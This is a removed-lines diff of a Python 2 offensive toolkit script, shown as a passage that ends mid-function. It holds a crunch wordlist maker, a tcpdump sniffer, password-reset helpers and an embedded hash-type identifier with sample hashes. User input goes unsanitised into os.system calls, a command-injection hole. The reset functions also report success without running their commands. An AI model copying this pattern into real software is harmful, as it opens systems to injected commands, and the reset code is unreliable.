-#--------------------# -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -#------------------# -#WORDLIST MAKER END# - - -#INTERNET TRAFFIC START# -#----------------------# -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -#--------------------# -#INTERNET TRAFFIC END# - - -#RESET ACCOUNT PASSWORD START# -#----------------------------# -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -#--------------------------# -#RESET ACCOUNT PASSWORD END# - - -#RESET UNIX PASSWORD START# -#-------------------------# -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -#-----------------------# -#RESET UNIX PASSWORD END# - - -#FIND HASH TYPE START# -#--------------------# -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - hs='f006a1863663c21c541c8d600355abfeeaadb5e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109260") - def sha1saltpass(): - hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109280") - def sha1saltmd5pass(): - hs='860465ede0625deebb4fbbedcb0db9dc65faec30' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109300") - def sha1saltmd5passsalt(): - hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109320") - def sha1saltsha1pass(): - hs='58714327f9407097c64032a2fd5bff3a260cb85f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109340") - def sha1saltsha1saltsha1pass(): - hs='cc600a2903130c945aa178396910135cc7f93c63' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109360") - def sha1usernamepass(): - hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109380") - def sha1usernamepasssalt(): - hs='00025111b3c4d0ac1635558ce2393f77e94770c5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109400") - def sha1md5pass(): - hs='fa960056c0dea57de94776d3759fb555a15cae87' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("1094202") - def sha1md5passsalt(): - hs='1dad2b71432d83312e61d25aeb627593295bcc9a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109440") - def sha1md5sha1pass(): - hs='8bceaeed74c17571c15cdb9494e992db3c263695' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109460") - def sha1sha1pass(): - hs='3109b810188fcde0900f9907d2ebcaa10277d10e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109480") - def sha1sha1passsalt(): - hs='780d43fa11693b61875321b6b54905ee488d7760' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109500") - def sha1sha1passsubstrpass03(): - hs='5ed6bc680b59c580db4a38df307bd4621759324e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109520") - def sha1sha1saltpass(): - hs='70506bac605485b4143ca114cbd4a3580d76a413' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109540") - def sha1sha1sha1pass(): - hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109560") - def sha1strtolowerusernamepass(): - hs='79f575543061e158c2da3799f999eb7c95261f07' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109580") - - def Haval192(): - hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110040") - def Haval192HMAC(): - hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110080") - def Tiger192(): - hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110020") - def Tiger192HMAC(): - hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("110060") - - def MD5passsaltjoomla1(): - hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("112020") - - def SHA1Django(): - hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: - jerar.append("113020") - - def Haval224(): - hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114040") - def Haval224HMAC(): - hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114080") - def SHA224(): - hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114020") - def SHA224HMAC(): - hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("114060") - - def SHA256(): - hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115020") - def SHA256HMAC(): - hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115120") - def Haval256(): - hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115040") - def Haval256HMAC(): - hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115140") - def GOSTR341194(): - hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115060") - def RipeMD256(): - hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115080") - def RipeMD256HMAC(): - hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115160") - def SNEFRU256(): - hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115100") - def SNEFRU256HMAC(): - hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115180") - def SHA256md5pass(): - hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115200") - def SHA256sha1pass(): - hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("115220") - - def MD5passsaltjoomla2(): - hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: - jerar.append("116020") - def SAM(): - hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: - jerar.append("116040") - - def SHA256Django(): - hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: - jerar.append("117020") - - def RipeMD320(): - hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("118020") - def RipeMD320HMAC(): - 